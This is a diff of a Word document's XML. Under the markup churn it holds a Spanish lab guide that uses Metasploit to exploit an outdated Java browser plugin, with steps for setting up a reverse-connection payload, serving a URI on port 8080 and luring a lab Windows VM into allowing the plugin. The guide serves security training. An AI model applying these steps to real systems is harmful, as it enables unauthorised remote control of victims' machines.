               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="31" name="Image30" descr=""/>
+                    <pic:cNvPr id="33" name="Image30" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId38"/>
+                    <a:blip r:embed="rId40"/>
                     <a:srcRect l="0" t="18756" r="0" b="15277"/>
                     <a:stretch>
                       <a:fillRect/>
@@ -10119,13 +10137,28 @@
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
         </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>omento del registro y haga clic en iniciar sesión.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
         <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
         <w:tab/>
         <w:t>Aparece la página principal de metasploit, desplace el puntero del mouse sobre Proyecto y seleccione Nuevo proyecto... en la lista desplegable.</w:t>
       </w:r>
@@ -10157,7 +10190,7 @@
             <wp:extent cx="6120130" cy="2678430"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="32" name="Image31" descr=""/>
+            <wp:docPr id="34" name="Image31" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -10165,13 +10198,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="32" name="Image31" descr=""/>
+                    <pic:cNvPr id="34" name="Image31" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId39"/>
+                    <a:blip r:embed="rId41"/>
                     <a:srcRect l="0" t="0" r="0" b="7153"/>
                     <a:stretch>
                       <a:fillRect/>
@@ -10261,7 +10294,7 @@
             <wp:extent cx="6120130" cy="2714625"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="33" name="Image32" descr=""/>
+            <wp:docPr id="35" name="Image32" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -10269,13 +10302,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="33" name="Image32" descr=""/>
+                    <pic:cNvPr id="35" name="Image32" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId40"/>
+                    <a:blip r:embed="rId42"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10330,7 +10363,7 @@
             <wp:extent cx="6120130" cy="2714625"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="34" name="Image33" descr=""/>
+            <wp:docPr id="36" name="Image33" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -10338,13 +10371,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="34" name="Image33" descr=""/>
+                    <pic:cNvPr id="36" name="Image33" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId41"/>
+                    <a:blip r:embed="rId43"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10375,7 +10408,7 @@
             <wp:extent cx="6120130" cy="2710180"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="35" name="Image34" descr=""/>
+            <wp:docPr id="37" name="Image34" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -10383,13 +10416,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="35" name="Image34" descr=""/>
+                    <pic:cNvPr id="37" name="Image34" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId42"/>
+                    <a:blip r:embed="rId44"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10460,7 +10493,7 @@
             <wp:extent cx="6120130" cy="2710180"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="36" name="Image35" descr=""/>
+            <wp:docPr id="38" name="Image35" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -10468,212 +10501,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="36" name="Image35" descr=""/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId43"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="6120130" cy="2710180"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:anchor>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Configure los ajustes de explotación:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>En las opciones de carga útil, seleccione el tipo de conexión como inverso de la lista desplegable e ingrese la dirección IP de la máquina host (Windows Server 2012) en el campo de texto Host de escucha.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>En las opciones del módulo, ingrese la dirección IP de la máquina host en el campo de texto SRVHost.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>Ingrese una ruta URI (en este laboratorio estamos usando saludos) y haga clic en Ejecutar módulo.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="37">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="column">
-              <wp:posOffset>0</wp:posOffset>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>3810</wp:posOffset>
-            </wp:positionV>
-            <wp:extent cx="6120130" cy="2714625"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="37" name="Image36" descr=""/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="37" name="Image36" descr=""/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId44"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="6120130" cy="2714625"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:anchor>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>La tarea se inició y el servidor Metasploit comienza a escuchar, como se muestra en la siguiente captura de pantalla:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="38">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="column">
-              <wp:align>center</wp:align>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>635</wp:posOffset>
-            </wp:positionV>
-            <wp:extent cx="6120130" cy="2710180"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="38" name="Image37" descr=""/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="38" name="Image37" descr=""/>
+                    <pic:cNvPr id="38" name="Image35" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -10712,7 +10540,57 @@
           <w:bCs w:val="false"/>
         </w:rPr>
         <w:tab/>
-        <w:t>Cambie a la máquina virtual Windows Server 2008, inicie el navegador Firefox, ingrese http: // [dirección IP del servidor de Windows 2012]: 8080 / greetings en la barra de direcciones.</w:t>
+        <w:t>Configure los ajustes de explotación:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>-</w:t>
+        <w:tab/>
+        <w:t>En las opciones de carga útil, seleccione el tipo de conexión como inverso de la lista desplegable e ingrese la dirección IP de la máquina host (Windows Server 2012) en el campo de texto Host de escucha.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>-</w:t>
+        <w:tab/>
+        <w:t>En las opciones del módulo, ingrese la dirección IP de la máquina host en el campo de texto SRVHost.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>-</w:t>
+        <w:tab/>
+        <w:t>Ingrese una ruta URI (en este laboratorio estamos usando saludos) y haga clic en Ejecutar módulo.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10723,18 +10601,18 @@
       </w:pPr>
       <w:r>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="39">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="37">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:align>center</wp:align>
+              <wp:posOffset>0</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>635</wp:posOffset>
+              <wp:posOffset>3810</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="5163185" cy="1466850"/>
+            <wp:extent cx="6120130" cy="2714625"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="39" name="Image38" descr=""/>
+            <wp:docPr id="39" name="Image36" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -10742,14 +10620,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="39" name="Image38" descr=""/>
+                    <pic:cNvPr id="39" name="Image36" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
                     <a:blip r:embed="rId46"/>
-                    <a:srcRect l="0" t="0" r="61128" b="75054"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10757,7 +10634,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5163185" cy="1466850"/>
+                      <a:ext cx="6120130" cy="2714625"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -10782,58 +10659,35 @@
           <w:bCs w:val="false"/>
         </w:rPr>
         <w:tab/>
-        <w:t>Aparece una notificación que dice que el complemento está desactualizado. Haga clic en Permitir.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>Aparece una ventana emergente de complementos tan pronto como usted hace clic en permitir en la notificación. Haga clic en permitir y recordar en la ventana emergente.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>Cambie a la máquina host de Windows Server 2012 y verifique el panel de tareas Metasploit. Metasploit comenzará a capturar la conexión inversa desde la máquina de destino.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
+        <w:t>La tarea se inició y el servidor Metasploit comienza a escuchar, como se muestra en la siguiente captura de pantalla:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="40">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="38">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:align>center</wp:align>
@@ -10844,7 +10698,7 @@
             <wp:extent cx="6120130" cy="2710180"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="40" name="Image39" descr=""/>
+            <wp:docPr id="40" name="Image37" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -10852,7 +10706,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="40" name="Image39" descr=""/>
+                    <pic:cNvPr id="40" name="Image37" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -10878,6 +10732,185 @@
           </wp:anchor>
         </w:drawing>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>Cambie a la máquina virtual Windows Server 2008, inicie el navegador Firefox, ingrese http: // [dirección IP del servidor de Windows 2012]: 8080 / greetings en la barra de direcciones.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="39">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5163185" cy="1466850"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="41" name="Image38" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="41" name="Image38" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId48"/>
+                    <a:srcRect l="0" t="0" r="61136" b="75067"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5163185" cy="1466850"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>Aparece una notificación que dice que el complemento está desactualizado. Haga clic en Permitir.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>-</w:t>
+        <w:tab/>
+        <w:t>Aparece una ventana emergente de complementos tan pronto como usted hace clic en permitir en la notificación. Haga clic en permitir y recordar en la ventana emergente.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>-</w:t>
+        <w:tab/>
+        <w:t>Cambie a la máquina host de Windows Server 2012 y verifique el panel de tareas Metasploit. Metasploit comenzará a capturar la conexión inversa desde la máquina de destino.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="40">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6120130" cy="2710180"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="42" name="Image39" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="42" name="Image39" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId49"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6120130" cy="2710180"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10922,7 +10955,7 @@
             <wp:extent cx="6120130" cy="2705735"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="41" name="Image40" descr=""/>
+            <wp:docPr id="43" name="Image40" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -10930,13 +10963,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="41" name="Image40" descr=""/>
+                    <pic:cNvPr id="43" name="Image40" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId48"/>
+                    <a:blip r:embed="rId50"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -11138,7 +11171,11 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="both"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -11148,2214 +11185,6 @@
         <w:t>-</w:t>
         <w:tab/>
         <w:t>Un atacante que encuentra vulnerabilidades en versiones anteriores de JRE puede crear exploits adecuados para ingresar al sistema y tomar el control.</w:t>
-      </w:r>
-      <w:r>
